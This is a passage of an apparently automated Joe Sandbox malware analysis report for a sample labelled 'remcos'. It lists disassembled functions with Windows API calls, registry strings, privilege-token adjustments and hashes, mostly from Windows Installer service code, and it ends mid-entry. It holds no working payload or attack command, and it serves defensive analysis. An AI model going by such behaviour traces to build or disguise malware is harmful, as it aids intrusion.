                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383428
                                                                • FreeSid.ADVAPI32(?), ref: 00383446
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383468
                                                                • FreeSid.ADVAPI32(?), ref: 003834A2
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003834C0
                                                                • FreeSid.ADVAPI32(?), ref: 003834DE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383500
                                                                • FreeSid.ADVAPI32(?), ref: 00383548
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383566
                                                                • FreeSid.ADVAPI32(?), ref: 00383584
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003835A6
                                                                • FreeSid.ADVAPI32(?), ref: 003835C4
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003835E2
                                                                • FreeSid.ADVAPI32(?), ref: 00383628
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383646
                                                                • FreeSid.ADVAPI32(?), ref: 00383664
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383686
                                                                • FreeSid.ADVAPI32(?), ref: 003836AE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003836CC
                                                                • FreeSid.ADVAPI32(?), ref: 003836EA
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383707
                                                                • FreeSid.ADVAPI32(?), ref: 00383725
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383747
                                                                • GetLengthSid.ADVAPI32(?), ref: 003837A0
                                                                • memset.MSVCRT ref: 003837C5
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 003837E8
                                                                • InitializeAcl.ADVAPI32(?,?,00000002), ref: 00383816
                                                                • AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 00383842
                                                                • GetAce.ADVAPI32(?,?,?), ref: 0038385D
                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00383887
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038389D
                                                                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 003838AE
                                                                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 003838C7
                                                                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 003838D6
                                                                • MakeSelfRelativeSD.ADVAPI32(?,?,?), ref: 003838F3
                                                                • GetLastError.KERNEL32 ref: 003838FD
                                                                • GlobalFree.KERNEL32(?), ref: 00383918
                                                                • GetLastError.KERNEL32 ref: 00383920
                                                                • FreeSid.ADVAPI32(?), ref: 0038393D
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeInitialize$Allocate$DescriptorSecurity$ErrorGlobalLastLength$AccessAllocAllowedDaclGroupMakeOwnerRelativeSelfmemset
                                                                • String ID:
                                                                • API String ID: 3802846876-0
                                                                • Opcode ID: 8ea299a8c61c4fc4876976747f9fddadb10aba79e01a71cb853d9baf142ed5b8
                                                                • Instruction ID: 43c35ea44b040aa72f6025a194e9779048f7983476faa2bb1e0379bded927d23
                                                                • Opcode Fuzzy Hash: 8ea299a8c61c4fc4876976747f9fddadb10aba79e01a71cb853d9baf142ed5b8
                                                                • Instruction Fuzzy Hash: E51229B1508345AFDB22AF61DC88BABB7ECFB84B41F1048ADF584D6290D771D905CB12
                                                                Function 003859F2 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 136registrystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                • RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                • RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                • GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                • RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                • lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                • RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                • RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                • memset.MSVCRT ref: 00385B84
                                                                • OutputDebugStringW.KERNEL32(?), ref: 00385BD4
                                                                • SetLastError.KERNEL32(00000000), ref: 00385BDB
                                                                  • Part of subcall function 00382F5E: RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ8,?,00385A48,?,?,?), ref: 00382F8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Value$CloseErrorLast$CreateDebugFreeGlobalOpenOutputQueryStringlstrlenmemset
                                                                • String ID: %s$($Debug$Error: %d. %s.$LastError$LastErrorMessage$P$ServerMain (CA): Open synchronization event failed$Software\Microsoft\Windows\CurrentVersion\Installer\CA$Software\Policies\Microsoft\Windows\Installer
                                                                • API String ID: 3407900974-1723650419
                                                                • Opcode ID: 940223a9b117a5d493d9dd126f20475bd7276facd52ab7addd8a68049139c7af
                                                                • Instruction ID: 041a4343f306ce5a336ccad8020796b39cd7c0a057f47b36efda1e25388c0643
                                                                • Opcode Fuzzy Hash: 940223a9b117a5d493d9dd126f20475bd7276facd52ab7addd8a68049139c7af
                                                                • Instruction Fuzzy Hash: 11513AB190031CEBEB23AB61DC85FAA77BCFB04345F0541E5E549A6190EA768E85CF90
                                                                Function 00385C84 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 189libraryfilestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00385CAD
                                                                • GetACP.KERNEL32(00000641,?,00000000), ref: 00385CE3
                                                                • LoadLibraryW.KERNEL32(KERNEL32), ref: 00385CF0
                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00385D02
                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,0000000A), ref: 00385D38
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00385D46
                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000641,?,?,00000401,00000000), ref: 00385D6C
                                                                • memset.MSVCRT ref: 00385DEE
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00385E07
                                                                  • Part of subcall function 00382E35: _vsnwprintf.MSVCRT ref: 00382E67
                                                                • lstrlenW.KERNEL32(?), ref: 00385E96
                                                                • WriteFile.KERNEL32(?,00000000,?,00000000), ref: 00385EB4
                                                                • WriteFile.KERNEL32(00382638,00000004,?,00000000), ref: 00385ECF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FileLibraryWritememset$AddressFormatFreeInfoLoadLocaleMessageProcVersion_vsnwprintflstrlen
                                                                • String ID: GetUserDefaultUILanguage$Install error %i$KERNEL32
                                                                • API String ID: 2411759445-2065445882
                                                                • Opcode ID: afeab26b18618e10548e39c3070196303d625a257cd73226b07ae991c0a01c29
                                                                • Instruction ID: 6e29a525fea692648783c74667b693ed7f18e011d090d7ca0ba3a54c625b0900
                                                                • Opcode Fuzzy Hash: afeab26b18618e10548e39c3070196303d625a257cd73226b07ae991c0a01c29
                                                                • Instruction Fuzzy Hash: 83517EB1900318ABEB12AB60DC89EFB77BCFB08365F1405E5F915E61D1EA70DE458B60
                                                                Function 00382F93 Relevance: 15.1, APIs: 10, Instructions: 80threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 00382FC1
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00382FC8
                                                                • GetLastError.KERNEL32 ref: 00382FD2
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00382FE9
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00382FF0
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0038300F
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000030,?,?), ref: 0038303B
                                                                • CloseHandle.KERNEL32(?), ref: 00383044
                                                                • GetLastError.KERNEL32 ref: 0038304A
                                                                • CloseHandle.KERNEL32(?), ref: 00383068
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Token$CloseCurrentErrorHandleLastOpenProcessThread$AdjustLookupPrivilegePrivilegesValue
                                                                • String ID:
                                                                • API String ID: 268630328-0
                                                                • Opcode ID: 8bd7b3f30d3d14dec5fffb0d563ece9995a0d4acf3af3510e7368103e7302a37
                                                                • Instruction ID: 913508ddcedd59be34bfa82213057b3a5b911b73e43516b43a9924eac69873e6
                                                                • Opcode Fuzzy Hash: 8bd7b3f30d3d14dec5fffb0d563ece9995a0d4acf3af3510e7368103e7302a37
                                                                • Instruction Fuzzy Hash: BF212DB1A00309EFDF12AFA5ED49B9DBBBDEF04701F104065F502E61A0DB7199028B21
                                                                Function 003830F2 Relevance: 10.6, APIs: 7, Instructions: 65memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 00383133
                                                                • GetLastError.KERNEL32(?,?), ref: 0038313D
                                                                • GetLengthSid.ADVAPI32(?,?,?), ref: 00383148
                                                                • FreeSid.ADVAPI32(00000000), ref: 0038315E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AllocateErrorFreeInitializeLastLength
                                                                • String ID:
                                                                • API String ID: 1611457584-0
                                                                • Opcode ID: d556334c5e90020cfe79bb0c0df4bbc4f1dbb0db8e3ff6a00bdc16ae16fc5b17
                                                                • Instruction ID: 72f9df0caea98c0b8491b47605690668c9eb38258a47b94557746601aacb3b85
                                                                • Opcode Fuzzy Hash: d556334c5e90020cfe79bb0c0df4bbc4f1dbb0db8e3ff6a00bdc16ae16fc5b17
                                                                • Instruction Fuzzy Hash: 4C1163B0910308EFDB07BBA4DC0DABEBB7CFB04B04F1044A9E412922A0D7718904DB10
                                                                Function 00389E35 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00389E62
                                                                • GetCurrentProcessId.KERNEL32 ref: 00389E71
                                                                • GetCurrentThreadId.KERNEL32 ref: 00389E7A
                                                                • GetTickCount.KERNEL32 ref: 00389E83
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00389E98
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                • String ID:
                                                                • API String ID: 1445889803-0
                                                                • Opcode ID: ee06d2594ff8e6dad77b38d87ea45c451e8656da780bc17501b3afa5c69433b9
                                                                • Instruction ID: 702341ffa3746406a7bbf09fdd8d41a34286602cfac968ad8ebab3305e5613ee
                                                                • Opcode Fuzzy Hash: ee06d2594ff8e6dad77b38d87ea45c451e8656da780bc17501b3afa5c69433b9
                                                                • Instruction Fuzzy Hash: 9C111C71D11308EBCB11DBB8D9487AEBBF9FF48354F65489AD405E7250E7309A048B50
                                                                Function 00387DD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StartServiceCtrlDispatcherW.ADVAPI32(?), ref: 00387DF2
                                                                • GetLastError.KERNEL32 ref: 00387DFC
                                                                  • Part of subcall function 003859F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                  • Part of subcall function 003859F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                  • Part of subcall function 003859F2: GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                  • Part of subcall function 003859F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                  • Part of subcall function 003859F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Value$CloseErrorLast$CreateCtrlDispatcherFreeGlobalQueryServiceStartlstrlen
                                                                • String ID: MSIServer$StartServiceCtrlDispatcher failed.
                                                                • API String ID: 2998827721-520530687
                                                                • Opcode ID: a384243abb39020a715f278aa2aa6d481469e81c9983715192177df837decb4a
                                                                • Instruction ID: a0e93b79e3b77dd8719da117f33469b10e466e3bd39e29ece49799e255aba972
                                                                • Opcode Fuzzy Hash: a384243abb39020a715f278aa2aa6d481469e81c9983715192177df837decb4a
                                                                • Instruction Fuzzy Hash: AEE0D871E103089BDF02FBB4C8097AE7BFDEB40309F1044E4D115E2180DB70D9068B51
                                                                Function 003895F0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00389726,00381000), ref: 003895F7
                                                                • UnhandledExceptionFilter.KERNEL32(00389726,?,00389726,00381000), ref: 00389600
                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00389726,00381000), ref: 0038960B
                                                                • TerminateProcess.KERNEL32(00000000,?,00389726,00381000), ref: 00389612
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                • String ID:
                                                                • API String ID: 3231755760-0
                                                                • Opcode ID: af16c6e6b54c8764e1d6b9c60d3813b8d145d7602710ffff9b1d0f4ff0b2cfd8
                                                                • Instruction ID: 41b55fee4ae3bbe3853cbcecfb7caa28da83f26c9660e1eda46360b9177101be
                                                                • Opcode Fuzzy Hash: af16c6e6b54c8764e1d6b9c60d3813b8d145d7602710ffff9b1d0f4ff0b2cfd8
                                                                • Instruction Fuzzy Hash: D4D01272000304FBCB422BE1EC0DA493F3CEF44322F004080F309C22A0CB354442CB65
                                                                Function 00389C10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00389BC0), ref: 00389C15
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 6dca79c6812d80a303f7881e9f7ca47739ce57b09cb4ba8921e5fe915d336d31
                                                                • Instruction ID: cba9aa336692802a3e8457f0b961977f6853e29f132a48a61a835946c0bb2cbe
                                                                • Opcode Fuzzy Hash: 6dca79c6812d80a303f7881e9f7ca47739ce57b09cb4ba8921e5fe915d336d31
                                                                • Instruction Fuzzy Hash: DC9002B0251740464A4337706C1D55527A45F4872AB4504D2E012C4294DA544140D711
                                                                Function 00387EB0 Relevance: 88.0, APIs: 40, Strings: 10, Instructions: 481windowregistryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00383C24: EnterCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383C31
                                                                  • Part of subcall function 00383C24: LeaveCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383CDF
                                                                • RegOpenKeyExW.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000002,00000000,00007530), ref: 00387EFB
                                                                • RegCloseKey.ADVAPI32(?), ref: 00387F0B
                                                                  • Part of subcall function 00388745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,00387F98,00000200), ref: 0038875F
                                                                  • Part of subcall function 00388745: memset.MSVCRT ref: 00388778
                                                                • CoUninitialize.OLE32 ref: 00387F5B
                                                                • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 00388058
                                                                • CoUninitialize.OLE32 ref: 00388066
                                                                • GetLastError.KERNEL32 ref: 0038806C
                                                                • GetLastError.KERNEL32(00000000), ref: 003880AC
                                                                • CoUninitialize.OLE32(00000002,00000000,00007530), ref: 003880C2
                                                                • InitializeCriticalSection.KERNEL32(0038C488,00000002,00000000,00007530), ref: 003881D2
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003881F5
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00388204
                                                                • GetLastError.KERNEL32 ref: 00388246
                                                                • GetLastError.KERNEL32 ref: 00388276
                                                                • CoRegisterClassObject.OLE32(003825E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 003882C0
                                                                • MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 00388343
                                                                • TranslateMessage.USER32(?), ref: 00388375
                                                                • DispatchMessageW.USER32(?), ref: 00388382
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00388394
                                                                • GetLastError.KERNEL32 ref: 003883C6
                                                                • GetLastError.KERNEL32 ref: 003883CC
                                                                • GetLastError.KERNEL32(00000000), ref: 0038841B
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038843C
                                                                • CloseHandle.KERNEL32 ref: 00388448
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 00388459
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038846C
                                                                • CloseHandle.KERNEL32 ref: 00388478
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 00388489
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038849C
                                                                • CloseHandle.KERNEL32 ref: 003884A8
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 003884B9
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 003884C3
                                                                • DeleteCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 003884E0
                                                                • CoUninitialize.OLE32(?,?,?,?,00000200), ref: 003884EC
                                                                • GlobalFree.KERNEL32(?), ref: 0038850D
                                                                • GlobalFree.KERNEL32(?), ref: 00388526
                                                                • GlobalFree.KERNEL32(?), ref: 0038853F
                                                                • GlobalFree.KERNEL32(?), ref: 00388558
                                                                • GlobalFree.KERNEL32(?), ref: 00388571
                                                                Strings
                                                                • Set of COMGLB_UNMARSHALING_POLICY failed., xrefs: 00388163
                                                                • ServiceThreadMain: CreateWaitableTimer failed., xrefs: 0038824C
                                                                • CLSID, xrefs: 00387EF1
                                                                • ServiceThreadMain: Class registration failed, xrefs: 00388400
                                                                • ServiceThreadMain: CoInitializeSecurity failed, xrefs: 003880A0
                                                                • Wait Failed in MsgWait., xrefs: 003883D4
                                                                • CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 00388105
                                                                • ServiceThreadMain: CreateEvent failed., xrefs: 0038840D
                                                                • ServiceThreadMain: SetWaitableTimer failed., xrefs: 0038827C
                                                                • ServiceThreadMain: CreateSD for CreateWaitableTimer failed., xrefs: 003881B1
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$ErrorLast$Global$FreeUninitialize$CloseEnterLeave$HandleMessage$CreateEvent$AbsoluteAllocClassDeleteDispatchInitializeMakeMultipleObjectObjectsOpenPeekRegisterTranslateWaitmemset
                                                                • String ID: CLSID$CoCreateInstance of CLSID_GlobalOptions failed.$ServiceThreadMain: Class registration failed$ServiceThreadMain: CoInitializeSecurity failed$ServiceThreadMain: CreateEvent failed.$ServiceThreadMain: CreateSD for CreateWaitableTimer failed.$ServiceThreadMain: CreateWaitableTimer failed.$ServiceThreadMain: SetWaitableTimer failed.$Set of COMGLB_UNMARSHALING_POLICY failed.$Wait Failed in MsgWait.
                                                                • API String ID: 535215923-1806920385
                                                                • Opcode ID: 13427feb05d728dd628582dca414e25513161ee2b7913a086e3a0f92f3013ef8
                                                                • Instruction ID: 5974d713e743d9f106b7d36e377ec7e70b0c03842a43d17903c026289cb4a28a
                                                                • Opcode Fuzzy Hash: 13427feb05d728dd628582dca414e25513161ee2b7913a086e3a0f92f3013ef8
                                                                • Instruction Fuzzy Hash: 96029FB5900329AFEB23BB749D89EAA77BCEB44714F5041D9F509A7190DF709E818F20
                                                                Function 003857C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 131libraryloaderwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(ISMIF32.DLL,00000000,00000800,?,00000000), ref: 003857F6
                                                                • GetProcAddress.KERNEL32(00000000,InstallStatusMIF), ref: 0038580C
                                                                • GetSystemDefaultLangID.KERNEL32(?,00000000), ref: 0038585C
                                                                • memset.MSVCRT ref: 0038589D
                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000000,?,?,00000105,00000000,?,00000000), ref: 003858C5
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0038C920,00000100,00000000,00000000,?,00000000), ref: 00385902
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00385976
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressByteCharDefaultFormatFreeLangLoadMessageMultiProcSystemWidememset
                                                                • String ID: ISMIF32.DLL$InstallStatusMIF$Installer error %i
                                                                • API String ID: 2186023739-4237920443
                                                                • Opcode ID: 3545ff2daaafd3e40388f22f1ed2bf789339541f99a5b94401db24fecf823602
                                                                • Instruction ID: 562e7f41135a1235a89df0d02cda882c1b84817781b33cab7f226ded72c0043b
                                                                • Opcode Fuzzy Hash: 3545ff2daaafd3e40388f22f1ed2bf789339541f99a5b94401db24fecf823602
                                                                • Instruction Fuzzy Hash: A741E370690318AAE723BB799C8EFFA36ACEB54720F1005E5F46AE60C0D7B49D404764
                                                                Function 00388F66 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 55libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
